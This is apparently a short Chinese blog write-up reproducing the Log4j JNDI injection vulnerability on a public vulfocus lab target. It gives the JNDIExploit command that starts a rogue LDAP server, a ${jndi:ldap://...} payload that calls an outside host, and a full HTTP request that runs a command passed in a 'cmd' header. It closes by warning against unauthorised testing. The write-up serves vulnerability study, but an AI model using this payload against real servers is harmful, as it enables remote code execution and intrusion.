前言
关于这个漏洞,啥都不用说了,直接发车。
工具下载
JNDIExploit:https://github.com/0x727/JNDIExploit
复现过程
-
启动靶场环境
直接用vulfocus启一个环境。
官网地址:http://vulfocus.fofa.so/
没注册的先注册,进来首页即可看到靶场
-
用JNDIExploit启一个ldap的服务。
-
命令如下:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.0.0
-
接着将payload更改如下:
payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}注意Content-Type的类型为:application/x-www-form-urlencoded
在请求头中添加cmd字段,后面跟上需要执行的命令即可。完整数据包如下:
POST /hello HTTP/1.1 Host: vulfocus.fofa.so:41624 Content-Type: application/x-www-form-urlencoded cmd: whoami Content-Length: 47 payload=${jndi:ldap://1.2.3.4:1234/TomcatBypass/TomcatEcho}
成功回显命令:
后记
使用公开靶场或自己搭建环境进行漏洞的复现和研究,是完全没问题的,但切忌随意在互联网进行大范围未授权测试,因为总会有人来收拾这一地鸡毛。